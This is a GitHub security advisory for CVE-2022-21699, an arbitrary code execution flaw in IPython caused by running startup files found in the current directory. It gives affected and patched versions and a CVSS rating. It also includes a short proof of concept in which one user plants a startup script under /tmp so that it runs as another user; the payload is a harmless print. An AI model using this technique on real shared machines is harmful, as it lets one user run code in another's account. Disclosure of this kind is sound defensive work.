Skip to content

Execution with Unnecessary Privileges in ipython

High severity GitHub Reviewed Published Jan 19, 2022 in ipython/ipython • Updated Feb 3, 2023

Package

pip ipython (pip)

Affected versions

< 5.11
>= 6.0.0, < 7.16.3
>= 7.17.0, < 7.31.1
>= 8.0.0, < 8.0.1

Patched versions

5.11
7.16.3
7.31.1
8.0.1

Description

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.

Proof of concept

User1:

mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py

User2:

cd /tmp
ipython

User2 will see:

Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets

Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,

Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.

References

@Carreau Carreau published to ipython/ipython Jan 19, 2022
Reviewed Jan 19, 2022
Published by the National Vulnerability Database Jan 19, 2022
Published to the GitHub Advisory Database Jan 21, 2022
Last updated Feb 3, 2023

Severity

High
8.3
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2022-21699

GHSA ID

GHSA-pq7m-3gw7-gq5x

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.